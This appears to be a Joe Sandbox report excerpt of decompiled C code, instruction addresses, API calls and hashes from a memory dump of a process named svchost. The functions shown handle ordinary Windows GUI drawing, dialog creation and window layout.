    								 *(_t389 + 0x6c) =  *(_t389 + 0x48);
    								if(E00424D20( *(_t389 + 0x48), _t401, _t371, _t389 + 0x54,  *((intOrPtr*)(_t389 + 0xb4)), 1, _t387,  *(_t389 + 0x10),  *((intOrPtr*)(_t389 + 0xc8))) == 0) {
    									goto L18;
    								}
    								 *(_t389 + 0x48) =  *(_t389 + 0x40);
    								 *(_t389 + 0x58) =  *(_t389 + 0x2c);
    								if(E00424D20( *(_t389 + 0x38), _t401, _t371, _t389 + 0x54, _t376,  *(_t389 + 0x14), _t387,  *(_t389 + 0x10), _t273) == 0) {
    									goto L18;
    								}
    								_t226 = CreateRectRgn(0, 0, 0, 0);
    								 *(_t389 + 0x1c) = _t226;
    								_t227 = GetClipRgn( *(_t371 + 4), _t226);
    								_t228 =  *(_t389 + 0x20);
    								 *(_t389 + 0x8c) = _t228;
    								 *(_t389 + 0x74) = _t228;
    								 *(_t389 + 0x6c) = _t228;
    								_t229 =  *(_t389 + 0x34);
    								 *(_t389 + 0x84) = _t229;
    								 *(_t389 + 0x7c) = _t229;
    								_t230 =  *(_t389 + 0x24);
    								 *(_t389 + 0x90) = _t230;
    								 *(_t389 + 0x70) = _t230;
    								 *(_t389 + 0x78) =  *(_t389 + 0x2c);
    								asm("sbb esi, esi");
    								 *(_t389 + 0x80) =  *(_t389 + 0x40);
    								_t380 = 1 +  ~(_t227 - 1);
    								 *(_t389 + 0x88) =  *(_t389 + 0x38);
    								 *(_t389 + 0x1c) = 0;
    								 *((intOrPtr*)(_t389 + 0x18)) = 0x4969e4;
    								 *(_t389 + 0xac) = 1;
    								E00489EBE(_t389 + 0x1c, CreatePolygonRgn(_t389 + 0x70, 5, 2));
    								_t129 = _t389 + 0x18; // 0x4969e4
    								E00489AFC(_t371, _t129, 1);
    								 *(_t389 + 0x44) =  *(_t389 + 0x20);
    								 *(_t389 + 0x4c) =  *(_t389 + 0x34);
    								 *(_t389 + 0x48) =  *(_t389 + 0x24);
    								 *(_t389 + 0x54) =  *(_t389 + 0x2c);
    								if(E00424D20( *(_t389 + 0x44), _t401, _t371, _t389 + 0x54,  *(_t389 + 0xb8),  *(_t389 + 0x94), _t387,  *(_t389 + 0x10), _t273) != 0) {
    									_t239 =  *(_t389 + 0x3c);
    									 *(_t389 + 0x8c) = _t239;
    									 *(_t389 + 0x74) = _t239;
    									 *(_t389 + 0x6c) = _t239;
    									_t240 =  *(_t389 + 0x28);
    									 *(_t389 + 0x84) = _t240;
    									 *(_t389 + 0x7c) = _t240;
    									_t241 =  *(_t389 + 0x38);
    									 *(_t389 + 0x80) =  *(_t389 + 0x2c);
    									 *(_t389 + 0x90) = _t241;
    									 *(_t389 + 0x70) = _t241;
    									 *(_t389 + 0x88) =  *(_t389 + 0x24);
    									 *(_t389 + 0x78) =  *(_t389 + 0x40);
    									if(_t380 != 1) {
    										E0048993F(_t371, 0);
    									} else {
    										SelectClipRgn( *(_t371 + 4),  *(_t389 + 0x14));
    									}
    									_t164 = _t389 + 0x18; // 0x4969e4
    									E00489F15(_t164);
    									E00489EBE(_t389 + 0x1c, CreatePolygonRgn(_t389 + 0x70, 5, 2));
    									_t167 = _t389 + 0x18; // 0x4969e4
    									E00489AFC(_t371, _t167, 1);
    									 *(_t389 + 0x44) =  *(_t389 + 0x3c);
    									 *(_t389 + 0x50) =  *(_t389 + 0x28);
    									if(E00424D20( *(_t389 + 0x40), _t401, _t371, _t389 + 0x54,  *(_t389 + 0xb8),  *(_t389 + 0x54), _t387,  *(_t389 + 0x10), _t273) != 0) {
    										if(_t380 != 1) {
    											E0048993F(_t371, 0);
    										} else {
    											SelectClipRgn( *(_t371 + 4),  *(_t389 + 0x14));
    										}
    										DeleteObject( *(_t389 + 0x14));
    										 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
    										 *(_t389 + 0xa0) = 4;
    										E00489F15(_t389 + 0x18);
    										 *(_t389 + 0xa0) = 0xffffffff;
    										 *(_t389 + 0x58) = 0x4969cc;
    										E0040B7D0(_t389 + 0x58);
    										_t190 = 1;
    										goto L20;
    									} else {
    										 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
    										 *(_t389 + 0xa0) = 3;
    										E00489F15(_t389 + 0x18);
    										goto L18;
    									}
    								}
    								 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
    								 *(_t389 + 0xa0) = 2;
    								E00489F15(_t389 + 0x18);
    								goto L18;
    							}
    							_t358 =  *(_t389 + 0xc0) - 1;
    							if(_t358 <= 0) {
    								goto L31;
    							}
    							_t262 = _t387;
    							_t319 = _t375 + _t387 - 4;
    							do {
    								_t381 =  *_t262;
    								_t262 = _t262 + 4;
    								 *_t319 = _t381;
    								_t319 = _t319 - 4;
    								_t358 = _t358 - 1;
    							} while (_t358 != 0);
    							goto L31;
    						}
    						_t359 = _t288 - 1;
    						if(_t359 < 0) {
    							goto L27;
    						}
    						_t320 = _t387;
    						_t264 =  *((intOrPtr*)(_t389 + 0xbc)) + _t359 * 4;
    						_t360 = 1 + _t359;
    						do {
    							_t274 =  *_t264;
    							_t264 = _t264 - 4;
    							 *_t320 = _t274;
    							_t320 = _t320 + 4;
    							_t360 = _t360 - 1;
    						} while (_t360 != 0);
    						goto L27;
    					} else {
    						L18:
    						 *(_t389 + 0xa0) = 0xffffffff;
    						 *(_t389 + 0x58) = 0x4969cc;
    						E0040B7D0(_t389 + 0x58);
    						goto L19;
    					}
    				}
    			}
    Instruction Addresses
    • One entry per line of the C-Code listing above, in the same order; the first 47 lines of the listing have no address entry and are omitted here.
    0x00424f50
    0x00424f50
    0x00424f52
    0x00424f5d
    0x00424f5e
    0x00424f65
    0x00424f6d
    0x00424f79
    0x00424f7d
    0x00425140
    0x00425140
    0x00425142
    0x0042514d
    0x0042515a
    0x0042515a
    0x00424f83
    0x00424f8d
    0x00000000
    0x00000000
    0x00424f93
    0x00424f98
    0x00000000
    0x00000000
    0x00424f9e
    0x00424fa0
    0x00424faa
    0x00424ffe
    0x00425005
    0x00425007
    0x0042500a
    0x0042500e
    0x00425011
    0x00425015
    0x00425018
    0x0042501e
    0x00425021
    0x00425024
    0x00425028
    0x0042502c
    0x0042502e
    0x0042502e
    0x00425034
    0x00425037
    0x0042503b
    0x0042503d
    0x0042503d
    0x00425044
    0x0042504b
    0x00425052
    0x0042505a
    0x00425069
    0x0042506f
    0x00424fac
    0x00424fac
    0x00424fb5
    0x00424fbe
    0x00424fc5
    0x00424fcc
    0x00424fd3
    0x00424fd9
    0x00424fe0
    0x00424fea
    0x00424fee
    0x00424ff6
    0x00424ff6
    0x00425078
    0x00000000
    0x00425086
    0x00425086
    0x004250a3
    0x004250ab
    0x004250b0
    0x004250b7
    0x004250c3
    0x004250cb
    0x004250b9
    0x004250b9
    0x004250b9
    0x004250cd
    0x004250dd
    0x004250e8
    0x004250eb
    0x004250f1
    0x004250f1
    0x004250f9
    0x00425106
    0x00425111
    0x0042511e
    0x00425122
    0x00425162
    0x00425178
    0x004251ae
    0x004251b3
    0x004251b6
    0x004251b8
    0x004251db
    0x004251df
    0x004251ee
    0x004251f5
    0x004251fc
    0x00425206
    0x00425211
    0x00425220
    0x0042522b
    0x00000000
    0x00000000
    0x0042523d
    0x0042524b
    0x0042525f
    0x00000000
    0x00000000
    0x0042526d
    0x00425278
    0x0042527c
    0x00425284
    0x00425290
    0x00425297
    0x0042529b
    0x0042529f
    0x004252a4
    0x004252ab
    0x004252af
    0x004252b5
    0x004252bc
    0x004252c4
    0x004252c8
    0x004252ca
    0x004252d1
    0x004252d2
    0x004252d9
    0x004252e1
    0x004252f2
    0x00425305
    0x0042530a
    0x00425313
    0x00425324
    0x0042532c
    0x00425334
    0x00425340
    0x00425360
    0x00425380
    0x0042538c
    0x00425393
    0x00425397
    0x0042539b
    0x004253a2
    0x004253a9
    0x004253ad
    0x004253b1
    0x004253b8
    0x004253bf
    0x004253c7
    0x004253ce
    0x004253d2
    0x004253e9
    0x004253d4
    0x004253dd
    0x004253dd
    0x004253ee
    0x004253f2
    0x0042540b
    0x00425410
    0x00425419
    0x0042542a
    0x00425433
    0x00425453
    0x00425476
    0x0042548d
    0x00425478
    0x00425481
    0x00425481
    0x00425497
    0x0042549d
    0x004254a9
    0x004254b1
    0x004254ba
    0x004254c5
    0x004254cd
    0x004254d2
    0x00000000
    0x00425455
    0x00425455
    0x00425461
    0x00425469
    0x00000000
    0x00425469
    0x00425453
    0x00425362
    0x0042536e
    0x00425376
    0x00000000
    0x00425376
    0x004251c1
    0x004251c6
    0x00000000
    0x00000000
    0x004251c8
    0x004251ca
    0x004251ce
    0x004251ce
    0x004251d0
    0x004251d3
    0x004251d5
    0x004251d8
    0x004251d8
    0x00000000
    0x004251ce
    0x0042517a
    0x0042517f
    0x00000000
    0x00000000
    0x00425188
    0x0042518a
    0x0042518d
    0x0042518e
    0x0042518e
    0x00425190
    0x00425193
    0x00425195
    0x00425198
    0x00425198
    0x00000000
    0x00425124
    0x00425124
    0x00425128
    0x00425133
    0x0042513b
    0x00000000
    0x0042513b
    0x00425122

    APIs
    • InflateRect.USER32(?,?,?), ref: 00424FF6
      • Part of subcall function 00424D20: SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00424E09
      • Part of subcall function 00424D20: OffsetRect.USER32(?,?,?), ref: 00424E16
      • Part of subcall function 00424D20: IntersectRect.USER32(?,?,?), ref: 00424E32
      • Part of subcall function 00424D20: IsRectEmpty.USER32(?), ref: 00424E3D
    • InflateRect.USER32(?,?,?), ref: 00425069
    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042526D
    • GetClipRgn.GDI32(?,00000000), ref: 0042527C
    • CreatePolygonRgn.GDI32 ref: 004252FA
    • SelectClipRgn.GDI32(?,?), ref: 004253DD
    • CreatePolygonRgn.GDI32(?,00000005,00000002), ref: 00425400
    • SelectClipRgn.GDI32(?,?), ref: 00425481
    • DeleteObject.GDI32(?), ref: 00425497
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ClipCreate$InflatePolygonSelect$DeleteEmptyIntersectObjectOffset
    • String ID: gfff$iI
    • API String ID: 1105800552-70996681
    • Opcode ID: bc7214ae48fee00aaff2e750a3885f8acc3ffc95615ef746991603891c79b5e6
    • Instruction ID: d13fe73bda9595855ae00289b830f5c414df7332b47b2c1c3a5bcb940fbf237d
    • Opcode Fuzzy Hash: bc7214ae48fee00aaff2e750a3885f8acc3ffc95615ef746991603891c79b5e6
    • Instruction Fuzzy Hash: 4DF106B06087419FD324DF19D980B6BBBE5BBC8304F548A2EF98987391DB74A805CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00484092(intOrPtr* __ecx) {
    				signed int _t79;
    				intOrPtr _t80;
    				DLGTEMPLATE* _t88;
    				intOrPtr _t90;
    				struct HWND__* _t91;
    				intOrPtr* _t142;
    				intOrPtr* _t145;
    				void* _t147;
    				void* _t149;
    
    				_t118 = __ecx;
    				E00473304(E00490C74, _t147);
    				_t145 = __ecx;
    				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
    				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
    				if( *(_t147 + 0x10) == 0) {
    					 *(_t147 + 0x10) =  *(E0048C6BF() + 8);
    				}
    				_t142 =  *((intOrPtr*)(E0048C6BF() + 0x1038));
    				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
    				 *(_t147 - 0x14) = 0;
    				 *(_t147 - 0x18) = 0;
    				 *(_t147 - 4) = 0;
    				E004870D1(_t118, 0x10);
    				E004870D1(_t118, 0x3c000);
    				if(_t142 == 0) {
    					L6:
    					if( *(_t147 + 8) == 0) {
    						L4:
    						_t79 = 0;
    						L31:
    						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
    						return _t79;
    					}
    					_t80 =  *0x4b8924; // 0x4b8938
    					 *((intOrPtr*)(_t147 - 0x1c)) = _t80;
    					 *(_t147 - 4) = 1;
    					 *((intOrPtr*)(_t147 - 0x20)) = 0;
    					if((0 | E00488F9B( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
    						L14:
    						E00488DEA(_t147 - 0x40,  *(_t147 + 8));
    						 *(_t147 - 4) = 2;
    						E00489124(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
    						 *(_t147 - 0x14) = E00488E87(_t147 - 0x40);
    						 *(_t147 - 4) = 1;
    						_t88 = E00488E79(_t147 - 0x40);
    						if( *(_t147 - 0x14) != 0) {
    							GlobalFix( *(_t147 - 0x14));
    							 *(_t147 + 8) = _t88;
    						}
    						L16:
    						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
    						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
    						_push(_t145);
    						E00485152();
    						_t90 =  *((intOrPtr*)(_t147 + 0xc));
    						if(_t90 != 0) {
    							_t91 =  *(_t90 + 0x1c);
    						} else {
    							_t91 = 0;
    						}
    						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00483EDA, 0);
    						 *(_t147 - 4) = 0;
    						E004832C2(_t147 - 0x1c);
    						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
    						if(_t142 != 0) {
    							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
    							if( *(_t147 - 0x18) != 0) {
    								 *((intOrPtr*)( *_t145 + 0xb4))(0);
    							}
    						}
    						if(E0048519E() == 0) {
    							 *((intOrPtr*)( *_t145 + 0xa4))();
    						}
    						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
    							DestroyWindow( *(_t147 - 0x18));
    							 *(_t147 - 0x18) = 0;
    						}
    						if( *(_t147 - 0x14) != 0) {
    							GlobalUnWire( *(_t147 - 0x14));
    							GlobalFree( *(_t147 - 0x14));
    						}
    						_t79 = 0 |  *(_t147 - 0x18) != 0x00000000;
    						goto L31;
    					}
    					if(GetSystemMetrics(0x2a) == 0 || E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
    						goto L16;
    					} else {
    						if( *((short*)(_t147 - 0x20)) == 8) {
    							 *((intOrPtr*)(_t147 - 0x20)) = 0;
    						}
    						goto L14;
    					}
    				}
    				_push(_t147 - 0x34);
    				if( *((intOrPtr*)( *_t145 + 0xb4))() != 0) {
    					 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
    					goto L6;
    				}
    				goto L4;
    			}
    Instruction Addresses
    • One entry per line of the C-Code listing above, in the same order; the first 12 lines of the listing have no address entry and are omitted here.
    0x00484092
    0x00484097
    0x004840a7
    0x004840a9
    0x004840ac
    0x004840af
    0x004840b9
    0x004840b9
    0x004840c1
    0x004840c9
    0x004840cc
    0x004840cf
    0x004840d2
    0x004840d5
    0x004840df
    0x004840e6
    0x00484112
    0x00484115
    0x004840fa
    0x004840fa
    0x004842a3
    0x004842a8
    0x004842b1
    0x004842b1
    0x00484117
    0x0048411c
    0x00484122
    0x0048412b
    0x00484144
    0x00484199
    0x0048419f
    0x004841aa
    0x004841ae
    0x004841be
    0x004841c1
    0x004841c5
    0x004841cd
    0x004841d2
    0x004841d8
    0x004841d8
    0x004841db
    0x004841db
    0x004841df
    0x004841e3
    0x004841e4
    0x004841e9
    0x004841ee
    0x004841f4
    0x004841f0
    0x004841f0
    0x004841f0
    0x0048420d
    0x00484210
    0x00484213
    0x00484237
    0x0048423d
    0x00484247
    0x0048424d
    0x00484254
    0x00484254
    0x0048424d
    0x00484261
    0x00484267
    0x00484267
    0x00484270
    0x0048427b
    0x00484281
    0x00484281
    0x00484287
    0x0048428c
    0x00484295
    0x00484295
    0x004842a0
    0x00000000
    0x004842a0
    0x00484150
    0x00000000
    0x0048418f
    0x00484194
    0x00484196
    0x00484196
    0x00000000
    0x00484194
    0x00484150
    0x004840ed
    0x004840f8
    0x0048410f
    0x00000000
    0x0048410f
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 00484097
    • GetSystemMetrics.USER32(0000002A), ref: 00484148
    • GlobalFix.KERNEL32(?), ref: 004841D2
    • CreateDialogIndirectParamA.USER32(?,?,?,Function_00083EDA,00000000), ref: 00484204
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateDialogGlobalH_prologIndirectMetricsParamSystem
    • String ID: Helv$MS Sans Serif$MS Shell Dlg
    • API String ID: 2252606490-2894235370
    • Opcode ID: 4a3884fbe658c80b991715bc1d2f4904b2f7739a31cc7e52ff83bc9b5d2950e7
    • Instruction ID: e6811b8878838c089d0cc764a83fd97f4fd015be76d61012e6114809db5b0040
    • Opcode Fuzzy Hash: 4a3884fbe658c80b991715bc1d2f4904b2f7739a31cc7e52ff83bc9b5d2950e7
    • Instruction Fuzzy Hash: 4B617B31A0020AEFCF14FFA4C9899AEBBB1BF54304F10497FF505A2291DB388A41CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00448240(void* __ecx) {
    				void* __ebp;
    				CHAR* _t100;
    				signed int _t103;
    				int _t122;
    				signed int _t123;
    				intOrPtr _t124;
    				void* _t126;
    				int _t138;
    				struct tagSIZE _t148;
    				intOrPtr _t149;
    				struct tagSIZE _t154;
    				intOrPtr _t155;
    				int _t156;
    				struct tagRECT* _t159;
    				CHAR* _t166;
    				void* _t169;
    				signed int _t171;
    				intOrPtr _t178;
    				long _t191;
    				void* _t192;
    				intOrPtr _t198;
    				long _t215;
    				intOrPtr _t237;
    				signed int _t239;
    				struct tagRECT* _t240;
    				void* _t244;
    				struct tagRECT* _t256;
    				struct HDC__* _t257;
    				void* _t258;
    
    				_push(0xffffffff);
    				_push(E00490678);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t257;
    				_t258 = _t257 - 0x34;
    				_t244 = __ecx;
    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x5c)) - 8)) != 0) {
    					L2:
    					_push(_t244);
    					E00489C16(_t258 + 0x34, _t261);
    					_t6 = _t244 + 0x90; // 0x90
    					 *(_t258 + 0x50) = 0;
    					 *((intOrPtr*)(_t258 + 0x10)) = E00489512(_t258 + 0x30, _t6);
    					_t100 =  *(_t244 + 0x5c);
    					_t154 = 0;
    					_t237 = 0;
    					if( *(_t100 - 8) != 0) {
    						GetTextExtentPoint32A( *(_t258 + 0x44), _t100,  *(_t100 - 8), _t258 + 0x18);
    						_t154 =  *(_t258 + 0x18);
    						_t237 =  *((intOrPtr*)(_t258 + 0x1c));
    					}
    					_t166 =  *(_t244 + 0x58);
    					if( *(_t166 - 8) != 0) {
    						GetTextExtentPoint32A( *(_t258 + 0x44), _t166,  *(_t166 - 8), _t258 + 0x18);
    						_t148 =  *(_t258 + 0x18);
    						if(_t148 > _t154) {
    							_t154 = _t148;
    						}
    						_t149 =  *((intOrPtr*)(_t258 + 0x1c));
    						_t265 = _t149 - _t237;
    						if(_t149 > _t237) {
    							_t237 = _t149;
    						}
    					}
    					E00489512(_t258 + 0x34,  *((intOrPtr*)(_t258 + 0x10)));
    					_t103 =  *(_t244 + 0x4c);
    					 *((intOrPtr*)(_t258 + 0x4c)) = 0xffffffff;
    					_t169 = _t103 + _t103;
    					_t155 = _t154 + _t169;
    					_t31 = _t103 * 2; // 0x2
    					 *((intOrPtr*)(_t258 + 0x14)) = _t237 + _t169 + _t31 + 2;
    					E00489C88(_t258 + 0x30, _t265);
    					L11:
    					_t171 =  *(_t244 + 0x3c);
    					 *(_t244 + 0x40) = 7;
    					_t239 = ((0x92492493 * _t171 >> 0x20) + _t171 >> 2) + ((0x92492493 * _t171 >> 0x20) + _t171 >> 2 >> 0x1f);
    					asm("cdq");
    					 *(_t244 + 0x44) = _t239;
    					if(_t171 % 7 != 0) {
    						 *(_t244 + 0x44) = _t239 + 1;
    					}
    					GetWindowRect( *(_t244 + 0x1c), _t258 + 0x20);
    					_t54 = _t244 + 0x80; // 0x80
    					_t240 = _t54;
    					SetRect(_t240,  *(_t258 + 0x20),  *(_t258 + 0x24),  *(_t244 + 0x48) *  *(_t244 + 0x40) + ( *(_t244 + 0x4c) << 1) +  *(_t258 + 0x20),  *(_t244 + 0x44) *  *(_t244 + 0x48) + ( *(_t244 + 0x4c) << 1) +  *(_t258 + 0x24));
    					if( *((intOrPtr*)( *(_t244 + 0x58) - 8)) != 0) {
    						_t191 = _t240->left;
    						if(_t155 > _t240->right - _t191) {
    							 *((intOrPtr*)(_t244 + 0x88)) = _t191 + _t155;
    						}
    						_t138 =  *(_t244 + 0x4c);
    						_t62 = _t244 + 0x70; // 0x70
    						_t256 = _t62;
    						_t192 = _t138 + _t138;
    						_t155 = _t240->right - _t240->left - _t192;
    						SetRect(_t256, _t138, _t138, _t138 + _t155, _t192 +  *((intOrPtr*)(_t258 + 0x14)));
    						 *((intOrPtr*)(_t244 + 0x8c)) =  *((intOrPtr*)(_t244 + 0x8c)) + ( *(_t244 + 0x4c) << 1) - _t256->top + _t256->bottom;
    					}
    					if( *((intOrPtr*)( *(_t244 + 0x5c) - 8)) != 0) {
    						_t215 = _t240->left;
    						if(_t155 > _t240->right - _t215) {
    							 *((intOrPtr*)(_t244 + 0x88)) = _t215 + _t155;
    						}
    						_t132 =  *(_t244 + 0x4c);
    						_t77 = _t244 + 0x60; // 0x60
    						_t159 = _t77;
    						SetRect(_t159,  *(_t244 + 0x4c), _t240->bottom - _t240->top, _t240->right -  *(_t244 + 0x4c) +  *(_t244 + 0x4c) - _t240->left + _t132, _t240->bottom - _t240->top + _t132 +  *((intOrPtr*)(_t258 + 0x14)));
    						 *((intOrPtr*)(_t244 + 0x8c)) =  *((intOrPtr*)(_t244 + 0x8c)) + ( *(_t244 + 0x4c) << 1) - _t159->top + _t159->bottom;
    					}
    					_t156 = GetSystemMetrics(1);
    					_t122 = GetSystemMetrics(0);
    					_t178 =  *((intOrPtr*)(_t244 + 0x88));
    					if(_t178 > _t122) {
    						OffsetRect(_t240, _t122 - _t178, 0);
    					}
    					_t123 = _t240->left;
    					if(_t123 < 0) {
    						OffsetRect(_t240,  ~_t123, 0);
    					}
    					_t124 =  *((intOrPtr*)(_t244 + 0x8c));
    					if(_t124 > _t156) {
    						OffsetRect(_t240, 0, _t156 - _t124);
    					}
    					_t126 = E00487591(_t244, _t240->left, _t240->top, _t240->right - _t240->left, _t240->bottom - _t240->top, 1);
    					 *[fs:0x0] =  *(_t258 + 0x44);
    					return _t126;
    				}
    				_t198 =  *((intOrPtr*)(__ecx + 0x58));
    				_t261 =  *((intOrPtr*)(_t198 - 8));
    				if( *((intOrPtr*)(_t198 - 8)) == 0) {
    					_t155 =  *((intOrPtr*)(_t258 + 0x10));
    					goto L11;
    				}
    				goto L2;
    			}
    Instruction Addresses
    • One entry per line of the C-Code listing above, in the same order; the first 32 lines of the listing have no address entry and are omitted here.
    0x00448246
    0x00448248
    0x0044824d
    0x0044824e
    0x00448255
    0x0044825b
    0x00448266
    0x00448276
    0x00448276
    0x0044827b
    0x00448280
    0x0044828b
    0x0044829e
    0x004482a2
    0x004482a5
    0x004482a7
    0x004482ae
    0x004482bf
    0x004482c1
    0x004482c5
    0x004482c5
    0x004482c9
    0x004482d1
    0x004482e4
    0x004482e6
    0x004482ec
    0x004482ee
    0x004482ee
    0x004482f0
    0x004482f4
    0x004482f6
    0x004482f8
    0x004482f8
    0x004482f6
    0x00448303
    0x00448308
    0x0044830b
    0x00448313
    0x00448318
    0x0044831e
    0x00448322
    0x00448326
    0x00448331
    0x00448331
    0x0044833d
    0x00448350
    0x00448357
    0x0044835a
    0x0044835f
    0x00448362
    0x00448362
    0x0044836e
    0x00448388
    0x00448388
    0x004483a3
    0x004483b1
    0x004483b6
    0x004483bc
    0x004483c2
    0x004483c2
    0x004483c8
    0x004483d0
    0x004483d0
    0x004483d3
    0x004483dc
    0x004483e8
    0x00448405
    0x00448405
    0x00448413
    0x00448418
    0x0044841e
    0x00448422
    0x00448422
    0x00448428
    0x0044842e
    0x0044842e
    0x0044845b
    0x00448478
    0x00448478
    0x0044848a
    0x0044848c
    0x0044848e
    0x0044849c
    0x004484a4
    0x004484a4
    0x004484a6
    0x004484aa
    0x004484b2
    0x004484b2
    0x004484b4
    0x004484bc
    0x004484c4
    0x004484c4
    0x004484dd
    0x004484ea
    0x004484f4
    0x004484f4
    0x00448268
    0x0044826e
    0x00448270
    0x0044832d
    0x00000000
    0x0044832d
    0x00000000

    APIs
    • GetTextExtentPoint32A.GDI32(?,?,?,00000090), ref: 004482BF
    • GetTextExtentPoint32A.GDI32(?,?,?,00000090), ref: 004482E4
    • GetWindowRect.USER32(?,?), ref: 0044836E
    • SetRect.USER32(00000080,?,?,?,?), ref: 004483A3
    • SetRect.USER32(00000070,?,?,?,?), ref: 004483E8
    • SetRect.USER32(00000060,?,?,?,?), ref: 0044845B
    • GetSystemMetrics.USER32(00000001), ref: 00448486
    • GetSystemMetrics.USER32(00000000), ref: 0044848C
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484A4
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484B2
    • OffsetRect.USER32(00000080,00000000,00000000), ref: 004484C4
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$ExtentMetricsPoint32SystemText$Window
    • String ID:
    • API String ID: 1551820068-0
    • Opcode ID: a4446e18df96f2cbf0effb5a56dfcd503b649246b3a5402b6eb9c7abde7e1d6a
    • Instruction ID: e6903ee4ef3fb42ed25bba1d36a8c29607807c2b30cf0d31d990ba31daf3a844
    • Opcode Fuzzy Hash: a4446e18df96f2cbf0effb5a56dfcd503b649246b3a5402b6eb9c7abde7e1d6a
